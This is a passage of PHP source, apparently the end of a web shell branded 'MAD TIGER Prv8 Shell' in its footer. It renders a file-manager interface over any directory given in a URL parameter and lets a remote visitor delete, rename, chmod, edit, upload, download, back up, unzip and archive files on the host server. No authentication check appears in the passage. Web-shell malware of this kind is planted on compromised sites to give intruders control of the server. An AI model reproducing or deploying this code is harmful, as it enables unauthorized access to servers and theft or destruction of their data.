  1601. }
  1602. }else{
  1603. ?>
  1604. <table class="tbl_exp" border='1'>
  1605. <tr id="thead">
  1606. <th>No</th><th>^</th><th>Name</th><th>Permission</th><th>Size</th><th>Last Modified</th><th>action</th>
  1607. </tr>
  1609. <?php
  1610. if(isset($_GET['45'])){
  1611. $d=$_GET['45'];
  1612. }else{
  1613. $d=getcwd();
  1614. }
  1615. $d=str_replace('\','/',$d);
  1616. $sdir=scandir($d);
  1617. $no=1;
  1618. echo'
  1619. <form method="post">
  1620. <tr class="hover">
  1622. <td style="width:25px;max-width:48px;">-</td><td style="width:20px">^</td><td style="width:20%;max-width:500px;">
  1623. <--[<a href="?45='.dirname($d).'">..</a>]</td><td>--</td><td>--</td><td>--</td><td>[<a href="?act='.$d.'&upload='.$d.'/'.$dir.'">upload</a>][<a href="?act='.$d.'&mkdir='.$d.'/'.$dir.'">newdir</a>][<a href="?act='.$d.'&newfile='.$d.'/'.$dir.'">Newfile</a>]</td></tr>';
  1624. foreach ($sdir as $dir) {
  1625. if(!is_dir("$d/$dir")||$dir=='.'||$dir=='..')continue;
  1626. echo'
  1628. <tr class="hover">
  1629. <td>'.$no++.'</td><td>
  1630. <input type="checkbox" name="cekd[]" value="'.$d.'/'.$dir.'" style="background:transparent;color: #fff;border: 1px solid #fff;">
  1631. </td>
  1632. <td style="width:20%;max-width:500px;">'.icon_folder.'
  1633. [<a href="?45='.$d.'/'.$dir.'">'.substr($dir,0,40).'</a>]</td>
  1634. <td>'.perms("$d/$dir").'</td><td>DIR</td><td>'.date('d M Y | H:m',filemtime("$d/$dir")).'</td><td style="width:20%;max-width:400px;">
  1635. [<a href="?act='.$d.'&rmdir='.$d.'/'.$dir.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$dir.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$dir.'">chmod</a>]</td></tr>';
  1636. }
  1637. foreach ($sdir as $file) {
  1638. if(!is_file("$d/$file"))continue;
  1639. $size = filesize("$d/$file")/1024;
  1640. $size = round($size,3);
  1641. if($size >= 1024){
  1642. $size = round($size/1024,2).' MB';
  1643. }else{
  1644. $size = $size.' KB';
  1645. }
  1646. echo'
  1647. <tr class="hover">
  1648. <td>'.$no++.'</td><td><input type="checkbox" name="cekf[]" value="'.$d.'/'.$file.'"></td><td style="width:20%;max-width:500px;">'.icon_file.'
  1649. -<a href="?act='.$d.'&src='.$d.'/'.$file.'">'.substr($file,0,40).'</a></td>
  1650. <td>'.perms("$d/$file").'</td><td>'.$size.'</td><td>'.date('d M Y | H:m',filemtime("$d/$file")).'</td><td style="width:20%;max-width:400px;">
  1651. [<a href="?act='.$d.'&edit='.$d.'/'.$file.'">edit</a>][<a href="?act='.$d.'&rm='.$d.'/'.$file.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$file.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$file.'">chmod</a>][<a href="?act='.$d.'&download='.$d.'/'.$file.'">Download</a>]</td></tr>';
  1652. }
  1654. echo'
  1655. <tr>
  1656. <td colspan="3">
  1657. <select name="SELECT">
  1658. <option> What Do You Want</option>
  1659. <option value="del">delete</option>
  1660. <option value="copy">backUp</option>
  1661. <option value="unzip">unzip</option>
  1662. <option value="gz">compress .gz</option>
  1663. <option value="tar"> compress .tar.gz </option>
  1664. </select>
  1665. <input type="submit" name="sbmt" value=">>" >
  1666. </form></td><td><form method="post">
  1667. font size : <input type="number" name="fz" value="'.$fz.'"><input type="submit" name="submitfz" value=">>"></form></td><td><form method="post">
  1668. background: <input type="color" name="bgcolor" value="'.$bg.'"><input type="submit" name="submitbg" value=">>"></form></td><td><form method="post">
  1669. font color: <input type="color" name="color" value="'.$col.'"><input type="submit" name="submitcol" value=">>"></form></td><td>responsive mode : '.$resmod.' </td></tr>
  1670. </table>';
  1672. if(isset($_POST['sbmt'])){
  1673. $file=$_POST['cekf'];
  1674. $dir=$_POST['cekd'];
  1675. if($_POST['select']=='del'){
  1676. if($_POST['cekf']){
  1678. foreach ($file as $cekf) {
  1679. if(unlink($cekf)){
  1680. echo"<meta http-equiv='refresh' content=0;url=>";
  1681. }
  1682. }
  1683. }
  1684. if($_POST['cekd']){
  1686. foreach ($dir as $cekd) {
  1687. if(rmdir($cekd)){
  1688. echo"<meta http-equiv='refresh' content=0;url=>";
  1689. }
  1690. }}}elseif($_POST['select']=='copy'){
  1691. if($_POST['cekf']){
  1693. foreach ($file as $copy) {
  1694. $copi=basename($copy);
  1695. if(!file_exists("45backUp")){
  1696. @mkdir('45backUp');
  1697. }
  1698. if(copy($copy,"45backUp/".basename($copy))){
  1699. echo"[<font color=lime>OK</font>]--> <a href='?act=".dirname($copy)."/45backUp&src=".dirname($copy)."/45backUp/".basename($copy)."'> ".basename($copy)." </a><br>";
  1700. }else{
  1701. echo "[<font color=grey>FAIL</font>]--> 45backUp/".basename($Copy)."<br>";
  1702. }
  1703. }
  1704. }
  1705. }elseif ($_POST['select']=='unzip') {
  1706. @mkdir("45extracted");
  1707. foreach ($file as $unzip) {
  1708. $zip = new ZipArchive;
  1709. $res = $zip->open($unzip);
  1711. if ($res === TRUE) {
  1713. $zip->extractTo("45extracted/");
  1715. $zip->close();
  1716. echo "[<font color=lime>OK</font>] extracted !<br>";
  1717. } else {
  1719. echo "[<font color=grey>FAIL</font>] feiled!";
  1720. }
  1721. }
  1722. }elseif($_POST['select']=='gz'){
  1723. if($_POST['cekf']){
  1724. if(!file_exists("45compressed")){
  1725. @mkdir("45compressed");
  1726. }
  1727. foreach($file as $gz){
  1728. $gzfile = "45compressed/".basename($gz).".gz";
  1729. $fp = gzopen($gzfile, 'w9');
  1730. if(gzwrite($fp, file_get_contents($gz))){
  1731. echo"[<font color=lime> OK </font>] Compressed !!--> <a href='?45=".dirname($gz)."/45compressed'>here</a>";
  1732. }
  1733. gzclose($fp);
  1735. }
  1736. }
  1737. }elseif ($_POST['select']=='tar') {
  1738. try
  1739. {
  1740. $a = new PharData('45archive.tar');
  1741. foreach($file as $tar){
  1742. $a->addFile($tar);
  1743. }
  1744. $a->compress(Phar::GZ);
  1745. @unlink('45archive.tar');
  1746. }
  1747. catch (Exception $e)
  1748. {
  1749. echo "Exception : " . $e;
  1750. }
  1751. }
  1752. }
  1753. }
  1754. function perms($file){
  1755. $perms = fileperms($file);
  1757. if (($perms & 0xC000) == 0xC000) {
  1758. // Socket
  1759. $info = 's';
  1760. } elseif (($perms & 0xA000) == 0xA000) {
  1761. // Symbolic Link
  1762. $info = 'l';
  1763. } elseif (($perms & 0x8000) == 0x8000) {
  1764. // Regular
  1765. $info = '-';
  1766. } elseif (($perms & 0x6000) == 0x6000) {
  1767. // Block special
  1768. $info = 'b';
  1769. } elseif (($perms & 0x4000) == 0x4000) {
  1770. // Directory
  1771. $info = 'd';
  1772. } elseif (($perms & 0x2000) == 0x2000) {
  1773. // Character special
  1774. $info = 'c';
  1775. } elseif (($perms & 0x1000) == 0x1000) {
  1776. // FIFO pipe
  1777. $info = 'p';
  1778. } else {
  1779. // Unknown
  1780. $info = 'u';
  1781. }
  1783. // Owner
  1784. $info .= (($perms & 0x0100) ? 'r' : '-');
  1785. $info .= (($perms & 0x0080) ? 'w' : '-');
  1786. $info .= (($perms & 0x0040) ?
  1787. (($perms & 0x0800) ? 's' : 'x' ) :
  1788. (($perms & 0x0800) ? 'S' : '-'));
  1790. // Group
  1791. $info .= (($perms & 0x0020) ? 'r' : '-');
  1792. $info .= (($perms & 0x0010) ? 'w' : '-');
  1793. $info .= (($perms & 0x0008) ?
  1794. (($perms & 0x0400) ? 's' : 'x' ) :
  1795. (($perms & 0x0400) ? 'S' : '-'));
  1797. // World
  1798. $info .= (($perms & 0x0004) ? 'r' : '-');
  1799. $info .= (($perms & 0x0002) ? 'w' : '-');
  1800. $info .= (($perms & 0x0001) ?
  1801. (($perms & 0x0200) ? 't' : 'x' ) :
  1802. (($perms & 0x0200) ? 'T' : '-'));
  1804. return $info;
  1805. }
  1806. ?>
  1807. <div style="font-size:11px;position:fixed;bottom:0;left:0;">
  1808. copyright &copy; <?php echo date('Y');?> | MAD TIGER Prv8 Shell | <a href="">Find Me On Facebook</a>
  1809. </div>
  1810. </body>
  1811. </html>
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